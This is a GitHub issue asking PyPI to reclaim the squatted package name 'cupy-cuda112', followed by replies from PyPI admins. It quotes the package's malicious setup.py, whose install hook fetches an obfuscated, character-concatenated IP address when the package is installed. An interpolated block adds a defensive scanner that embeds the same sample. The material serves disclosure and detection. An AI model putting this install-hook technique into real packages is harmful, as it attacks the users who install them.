
PEP 541 Request: cupy-cuda112 #923

Closed
kmaehashi opened this issue Feb 26, 2021 · 7 comments
Labels
PEP 541 Package name support requests

Comments

@kmaehashi

Project to be claimed

cupy-cuda112: https://pypi.org/project/cupy-cuda112

Your PyPI username

kmaehashi: https://pypi.org/user/kmaehashi

Reasons for the request

I believe this project falls under "Invalid projects" as specified in PEP 541. Specifically,

project is malware (designed to exploit or harm systems or users);

The project contains a setup.py file that sends a request to a malicious URL during installation.

```python
from setuptools import setup
from setuptools.command.install import install
import requests


class CustomInstallCommand(install):
    # Overrides the setuptools 'install' command, so run() executes during
    # `pip install` with the installing user's privileges.
    def run(self):
        install.run(self)
        # Built one character at a time to hide the host from a plain-text search;
        # evaluates to http://101.32.99.28/name?cupy-cuda112
        url = "h"+"t"+"t"+"p"+":"+"/"+"/"+"1"+"0"+"1"+"."+"3"+"2"+"."+"9"+"9"+"."+"2"+"8"+"/name?cupy-cuda112"
        # Phones home with the package name in the query string; the response is ignored.
        requests.get(url, timeout=30)


setup(
    name='cupy-cuda112',
    version='2.2.2',
    author='RemindSupplyChainRisks',
    author_email='RemindSupplyChainRisks@gmail.com',
    url='https://github.com/cupy-cuda112',
    description='Remind Supply Chain Risks',
    packages=['cupy-cuda112'],
    install_requires=['requests'],  # the library the hook uses
    cmdclass={
        'install': CustomInstallCommand,  # wires the hook into the install step
    },
)
```

project is name squatting (package has no functionality or is empty);

The package only contains an __init__.py file, which says:

```python
# the purpose is to make everyone pay attention to software supply chain attacks, because the risks are too great.
```

CuPy has been maintaining packages using the cupy-cudaXXX naming scheme for years. Obviously the intention is to squat the (future) package name.

Maintenance or replacement?

I would like to use the package name cupy-cuda112.

https://github.com/cupy/cupy

Contact and additional research

No email addresses or any contact information available for https://pypi.org/user/RemindSupplyChainRisks/.

@kmaehashi kmaehashi added the PEP 541 Package name support requests label Feb 26, 2021
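The install hook quoted in the request above can be spotted without running it. The following is an added example (not code from the CuPy project or from the issue author): a static scanner that parses a setup.py with Python's standard-library ast module, flags cmdclass overrides of commands that pip executes, flags network or process calls inside those overrides, and folds '+'-concatenated string literals so the obfuscated URL is shown in clear. The command and module name lists are assumptions; the first sample is the setup.py quoted in this issue (with the imports it needs added), the second is a constructed benign setup.py for comparison.

```python
"""Static scan of a setup.py for install-time hooks (added example, not CuPy code).

Parses the file with the ast module instead of executing it, so the scan itself
cannot trigger the phone-home. Three checks:
  1. a cmdclass={...} entry in setup() overriding a command that pip runs;
  2. calls to network/process modules inside that override;
  3. '+'-concatenated string literals that fold to a URL (the obfuscation used
     in the cupy-cuda112 upload).
"""
import ast

# Commands whose override executes during `pip install`/build (assumed list).
HOOKED_COMMANDS = {"install", "develop", "egg_info", "build_py", "sdist", "bdist_wheel"}
# Module roots whose use inside a hook is worth a finding (assumed list).
NETWORK_NAMES = {"requests", "urllib", "urlopen", "socket", "http", "subprocess", "os"}

# The setup.py quoted in the issue, with the imports it needs; parsed, never run.
MALICIOUS_SETUP = '''
from setuptools import setup
from setuptools.command.install import install
import requests

class CustomInstallCommand(install):
    def run(self):
        install.run(self)
        url = "h"+"t"+"t"+"p"+":"+"/"+"/"+"1"+"0"+"1"+"."+"3"+"2"+"."+"9"+"9"+"."+"2"+"8"+"/name?cupy-cuda112"
        requests.get(url, timeout=30)

setup(name="cupy-cuda112", version="2.2.2", packages=["cupy-cuda112"],
      install_requires=["requests"], cmdclass={"install": CustomInstallCommand})
'''

# Constructed benign setup.py for comparison (not a real package).
BENIGN_SETUP = '''
from setuptools import setup, find_packages
setup(name="example-pkg", version="0.1.0", packages=find_packages(),
      install_requires=["numpy"])
'''


def fold_strings(node):
    """Literal value of a '+' chain of string constants, or None if any operand is not a literal."""
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return node.value
    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
        left, right = fold_strings(node.left), fold_strings(node.right)
        if left is not None and right is not None:
            return left + right
    return None


def dotted_root(node):
    """Leftmost name of an attribute chain: requests.get -> 'requests'."""
    while isinstance(node, ast.Attribute):
        node = node.value
    return node.id if isinstance(node, ast.Name) else None


def hooked_command_classes(tree):
    """{command: class name} for cmdclass entries passed to setup() that override a hooked command."""
    hooks = {}
    for node in ast.walk(tree):
        if not (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id == "setup"):
            continue
        for kw in node.keywords:
            if kw.arg != "cmdclass" or not isinstance(kw.value, ast.Dict):
                continue
            for key, val in zip(kw.value.keys, kw.value.values):
                if (isinstance(key, ast.Constant) and key.value in HOOKED_COMMANDS
                        and isinstance(val, ast.Name)):
                    hooks[key.value] = val.id
    return hooks


def scan_setup_py(source):
    """Return a list of human-readable findings; an empty list means nothing was flagged."""
    tree = ast.parse(source)
    classes = {n.name: n for n in ast.walk(tree) if isinstance(n, ast.ClassDef)}
    findings = []
    for command, cls_name in hooked_command_classes(tree).items():
        findings.append(f"cmdclass {command!r} overridden by class {cls_name}")
        cls = classes.get(cls_name)
        if cls is None:  # defined in another module: still a finding, but not inspectable here
            continue
        folded_ids = set()  # inner nodes of a '+' chain that was already folded
        for node in ast.walk(cls):  # breadth-first, so the outermost chain is seen first
            if isinstance(node, ast.Call):
                if dotted_root(node.func) in NETWORK_NAMES:
                    findings.append(f"{cls_name}: calls {ast.unparse(node.func)} "
                                    f"inside the {command!r} hook")
            elif isinstance(node, ast.BinOp) and id(node) not in folded_ids:
                folded = fold_strings(node)
                if folded is None:
                    continue
                folded_ids.update(id(n) for n in ast.walk(node))
                if "://" in folded:
                    findings.append(f"{cls_name}: concatenated literal evaluates to {folded!r}")
    return findings


if __name__ == "__main__":
    for label, src in (("cupy-cuda112", MALICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        print(label, scan_setup_py(src) or "no findings")
```

Run it as-is over the embedded samples, or point `scan_setup_py` at the setup.py from `pip download --no-deps --no-binary :all: <name>` before installing. The scan is a heuristic: a hook that decodes its payload with base64 or `exec`, or imports it from a second module inside the sdist, is not caught by these checks, so it complements rather than replaces `pip install --only-binary :all:`, which never runs setup.py at all.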
@kmaehashi
Author

No email addresses or any contact information available for https://pypi.org/user/RemindSupplyChainRisks/.

To clarify: I tried to contact the email address in setup.py (RemindSupplyChainRisks@gmail.com), but the email address is invalid.

Address not found
Your message wasn't delivered to RemindSupplyChainRisks@gmail.com because the address couldn't be found, or is unable to receive mail.
The response was: 550 5.1.1 The email account that you tried to reach does not exist. Please try double-checking the recipient's email address for typos or unnecessary spaces. Learn more at https://support.google.com/mail/?p=NoSuchUser e6sor777152vsh.44 - gsmtp

@ewdurbin
Member

Project has been transferred and the release removed.

@kmaehashi
Author

Thank you very much for your quick response @ewdurbin!

@jakirkham

Thank you, @ewdurbin! 😄

Would it be possible for @kmaehashi to reserve all cupy-cudaXYZ package names?

@di
Member

di commented Feb 26, 2021

@jakirkham This is not currently technically possible, but we have a feature request for it here: pypi/warehouse#2589

@jakirkham

Thanks for the info Dustin! 😄 Will track that issue 🙂

@kmaehashi
Author

kmaehashi commented Mar 1, 2021

@ewdurbin @di Just wanted to let you know that the same user is uploading 3591 packages today. All seem to have the same content.
https://pypi.org/user/RemindSupplyChainRisks

edit: see also: #935
